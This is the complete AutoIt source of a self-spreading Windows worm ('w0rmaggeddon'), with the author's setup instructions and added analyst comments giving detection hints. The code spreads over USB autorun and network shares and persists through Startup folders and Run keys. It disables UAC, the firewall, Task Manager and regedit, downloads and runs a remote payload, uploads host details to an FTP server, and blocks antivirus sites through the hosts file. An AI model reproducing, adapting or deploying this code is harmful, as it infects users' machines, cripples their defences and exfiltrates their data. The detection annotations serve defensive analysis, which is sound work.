w0rmaggeddon 1.0
Features:
USB Spread
Shared Folder Spreading
Startup
Block AV websites
DL and Execute
FTP Logging
Mutex - Ensures only Running once at any one time
Disables: Task Manager, Regedit, Firewall, LUA etc
Code:
>
;w0rmaggeddon - Jordan Goodby Programming v1
; By using this code you agree to use this for EDUCATIONAL purposes only. I am not liable for any damage caused by this code
; You may modify and freely distribute this code providing you credit me "Jordan Goodby - [email protected]"
; You receive no support with this code so please do not ask
;_____________Instructions __________________
; Edit $url and input your .exe file (Direct Link)
; Edit $Save And input the local file name including extension e.g. Updates.exe
; Edit $ftpadd with your ftp server address
; Edit $ftpuse with your ftp username
; Edit $ftppas with your ftp Password
; Compile The code to an Exe
; Use for educational Reasons
;Logs are Sent Via FTP to the Input Details
; Script-level setup and call sequence (analyst notes).
; #RequireAdmin asks for elevation when the script starts; the HKLM registry writes in
; reg() and the hosts-file writes in redirect() target locations that normally need it.
#RequireAdmin
; #NoTrayIcon suppresses the AutoIt tray icon, so nothing visible marks the running script.
#NoTrayIcon
; NOTE(review): the four #include directives name no file in this listing - presumably
; the file names were lost when the page was extracted.
#include
#include
#include
#include
Global $ip, $url, $save
; Both values are empty in this listing; dl() hands them to InetGet() and ShellExecute().
$url = ""
$save = ""
; Single-instance guard: the script exits when _Singleton() returns 0 for the fixed name
; "Virus". The page's feature list calls this a mutex, so that constant name is a
; host-side indicator an analyst can search for.
if _Singleton("Virus",1) = 0 Then
Exit
EndIf
; Fixed order of actions: local copies, removable drives, registry changes, network
; share, download-and-run, host data upload over FTP, hosts-file edits.
copy()
autorun()
reg()
share()
dl()
data()
redirect()
; copy() - persistence by file drop: copies the running script into four locations.
; The trailing 1 is FileCopy's overwrite flag, so an existing copy is replaced on each run.
; Triage: an unexpected executable in any Startup folder or directly in the user's
; AppData directory, with the same name as the sample, matches this function.
func copy()
; Current user's Startup folder.
FileCopy(@ScriptFullPath,@StartupDir,1)
; All-users Startup folder.
filecopy(@ScriptFullPath,@StartupCommonDir,1)
; Hard-coded all-users Startup path (drive letter fixed to C:).
FileCopy(@ScriptFullPath, "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\", 1)
; Current user's application-data directory.
FileCopy(@ScriptFullPath,@AppDataDir,1)
EndFunc
; autorun() - removable-media propagation: for every drive reported as "Removable",
; copies the script to the drive and appends an autorun.inf that references it.
; Triage: an autorun.inf in a drive root containing the Action text
; "Open folder to view files" and the shell32.dll,4 icon, next to an executable named
; on the Shellexecute= line, matches this function.
; Mitigation: keep AutoRun/AutoPlay disabled for removable media by policy and scan
; removable drives on insertion.
func autorun()
$var = DriveGetDrive( "Removable" )
; Skip the loop when drive enumeration failed.
If NOT @error Then
; $var[0] is used as the drive count; entries 1..$var[0] are the drive names.
For $i = 1 to $var[0]
filecopy(@ScriptFullPath,$var[$i],1)
; FileWriteLine appends, so repeated runs add the same section to autorun.inf again.
FileWriteLine($var[$i] & "\autorun.inf","[autorun]" & @crlf & "Action=Open folder to view files" & @crlf & "Icon=%systemroot%\system32\shell32.dll,4" & @crlf & "Shellexecute=" & @scriptname)
Next
EndIf
EndFunc
; reg() - registry persistence and defence tampering. Every value written here is a
; usable detection point: registry-change telemetry on these keys, or a baseline
; comparison of the listed values, will show the modification.
; Remediation means removing the two Run values and restoring each policy value to the
; organisation's baseline, not just deleting the dropped file.
func reg()
; Persistence: two HKLM Run values, "Updater" (full path of the running script) and
; "Windows Updater" (the script's file name under C:\).
RegWrite("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "Updater", "REG_SZ", @ScriptFullPath)
RegWrite("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "Windows Updater", "REG_SZ", "C:\" & @ScriptName)
; EnableLUA = 0 switches off UAC (listed as "LUA" in the page's feature list).
RegWrite("HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\", "EnableLUA", "REG_DWORD", 0)
; EnableFirewall = 0 under the SharedAccess service parameters.
RegWrite("HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\", "EnableFirewall", "REG_DWORD", 0)
; Per-user policy: Task Manager disabled.
RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", 1)
; Explorer "Hidden" = 2: hidden files are not shown, which conceals files marked hidden.
RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "Hidden", "REG_DWORD", 2)
; Same DisableTaskMgr write as two lines above (duplicate in the original).
RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", 1)
; Per-user policy: registry editing tools disabled.
RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", 1)
; Per-user policy: password change disabled.
RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableChangePassword", "REG_DWORD", 1)
; Explorer policy values LockTaskbar (HKLM) and NoSaveSettings (HKCU) set to 1.
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "LockTaskbar", "REG_DWORD", 1)
; EnableFirewall = 0 again, this time in the firewall's StandardProfile policy key.
RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile","EnableFirewall","REG_DWORD",0)
regwrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoSaveSettings","REG_DWORD",1)
EndFunc
; share() - creates C:\Shared, places a copy of the script in it and publishes the
; folder as a network share named "Shared Files".
; Triage: an unexpected C:\Shared directory and a share called "Shared Files" on a
; workstation match this function; share-creation auditing on endpoints records the event.
func share()
DirCreate("C:\Shared")
FileCopy(@ScriptFullPath,"C:\Shared\",1)
; Share is registered against @IPAddress1 as a disk share ($STYPE_DISKTREE).
_Net_Share_ShareAdd(@IPAddress1,"Shared Files",$STYPE_DISKTREE,"C:\Shared")
; "+SH" adds the System and Hidden attributes to the file named by @ScriptName
; (a bare file name, so it is resolved against the current working directory).
FileSetAttrib(@ScriptName,"+SH")
EndFunc
; dl() - download-and-execute stage: fetches $url to the local path $save, then
; launches the saved file. Both globals are empty strings in this listing.
; Detection: an outbound HTTP(S) fetch by the script's process followed directly by
; that process spawning the file it just wrote.
func dl()
; NOTE(review): third argument 1 presumably forces a fresh fetch and fourth argument 0
; makes the call wait for completion - confirm against the InetGet documentation.
InetGet($url,$save,1,0)
ShellExecute($save)
EndFunc
; data() - host-profiling stage: stores the result of _GetIP() in the global $ip, then
; builds the report (gather) and uploads it (ftpup).
; NOTE(review): _GetIP() is not defined in this listing; it presumably comes from one of
; the #include files and looks up the machine's public address - confirm.
func data()
$ip = _GetIP()
Gather()
ftpup()
EndFunc
; gather() - writes a host report to conf.ini (relative path, so it lands in the
; process's current working directory).
; Fields written: computer name, user name, $ip, execution date and time, OS version and
; whether a copy of the script exists in the user's Startup folder.
; Triage: a conf.ini beginning with "Computer Name: " beside the sample is the staging
; file for the FTP upload in ftpup().
func gather()
; Record whether the Startup-folder copy is present.
if FileExists(@startupdir & "\" & @scriptname) Then
$startup = "YES"
Else
$startup = "NO"
EndIf
; FileWrite appends when conf.ini already exists, so one file can hold several reports.
FileWrite("conf.ini","Computer Name: " & @ComputerName & @crlf & "Username: " & @username & @crlf & "IP Address: " & $ip & @crlf & "Execution Time: " & @mday & "/" & @mon & "/" & @year & " @ " & @hour & ":" & @min & @crlf & "Os Version: " & @OSVersion & @CRLF & "Startup Check: " & $startup )
EndFunc
; ftpup() - exfiltration stage: uploads conf.ini to an FTP server.
; Server address, user name and password are empty strings in this listing; in a built
; sample they would be embedded in the binary, where an analyst can recover them.
; Detection: FTP is cleartext, so an outbound FTP session from a workstation carrying a
; STOR of a file named <computer name><date> <time>.inf is visible to network monitoring;
; blocking outbound FTP from endpoints removes this channel.
func ftpup()
$ftpadd = ""
$ftpuse = ""
$ftppas = ""
; NOTE(review): "Logs" is presumably the agent/session name passed to the FTP UDF - confirm.
$sesh = _FTP_Open("Logs")
$conn = _FTP_Connect($sesh,$ftpadd,$ftpuse,$ftppas)
; Remote name = computer name + day + month + year + " " + hour + ":" + minute + ".inf".
_ftp_fileput($conn,"conf.ini",@ComputerName & @mday & @mon & @YEAR & " " & @hour & ":" & @min & ".inf")
EndFunc
; redirect() - appends 20 entries to the hosts file that point ten antivirus and
; malware-analysis sites (bare and www. forms) at 127.0.0.1, so the host cannot reach them.
; The path is hard-coded to C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts.
; Detection: file-integrity monitoring on the hosts file, or a check for security-vendor
; domains mapped to loopback. FileWriteLine appends, so each run adds the same 20 lines
; again; duplicated entries are a further tell.
; Remediation: restore the hosts file from a known-good baseline.
func redirect()
FileWriteLine("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts","127.0.0.1 virustotal.com")
FileWriteLine("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts","127.0.0.1 virusscan.jotti.org")
FileWriteLine("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts","127.0.0.1 anubis.iseclab.org")
FileWriteLine("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts","127.0.0.1 threatexpert.com")
FileWriteLine("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts","127.0.0.1 clamwin.com")
FileWriteLine("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts","127.0.0.1 avira.com")
FileWriteLine("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts","127.0.0.1 avg.com")
FileWriteLine("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts","127.0.0.1 comodo.com")
FileWriteLine("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts","127.0.0.1 mcafee.com")
FileWriteLine("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts","127.0.0.1 safer-networking.org")
; Same ten domains again with the www. prefix.
FileWriteLine("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts","127.0.0.1 www.virustotal.com")
FileWriteLine("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts","127.0.0.1 www.virusscan.jotti.org")
FileWriteLine("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts","127.0.0.1 www.anubis.iseclab.org")
FileWriteLine("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts","127.0.0.1 www.threatexpert.com")
FileWriteLine("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts","127.0.0.1 www.clamwin.com")
FileWriteLine("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts","127.0.0.1 www.avira.com")
FileWriteLine("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts","127.0.0.1 www.avg.com")
FileWriteLine("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts","127.0.0.1 www.comodo.com")
FileWriteLine("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts","127.0.0.1 www.mcafee.com")
FileWriteLine("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts","127.0.0.1 www.safer-networking.org")
EndFunc